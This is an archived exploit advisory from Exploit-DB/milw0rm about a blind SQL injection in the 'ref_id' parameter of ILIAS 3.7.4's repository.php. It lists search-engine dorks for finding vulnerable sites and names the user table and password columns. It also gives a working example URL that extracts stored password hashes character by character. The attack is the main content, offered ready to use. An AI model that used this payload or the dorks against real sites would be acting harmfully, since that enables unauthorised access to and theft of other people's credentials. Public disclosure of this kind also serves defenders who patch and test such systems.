ILIAS 3.7.4 - 'ref_id' Blind SQL Injection

EDB-ID:

7570


Platform:

PHP

Published:

2008-12-24

###############################################################
#
#      ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        24.12.2008
#
###############################################################
#                                                             
#      Developer: http://www.ilias.de
#      Dork 1: "powered by ILIAS"
#      Dork 2: inurl:repository.php ilias
#      Description: The GET Parameter "ref_id" in "repository.php"
#		    contains a Blind SQL Injection Vulnerability
#
#      Usertable:         usr_data
#      Important columns: usr_id, login, passwd
#
#      Example:
#      http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
#                                                             
###############################################################

# milw0rm.com [2008-12-24]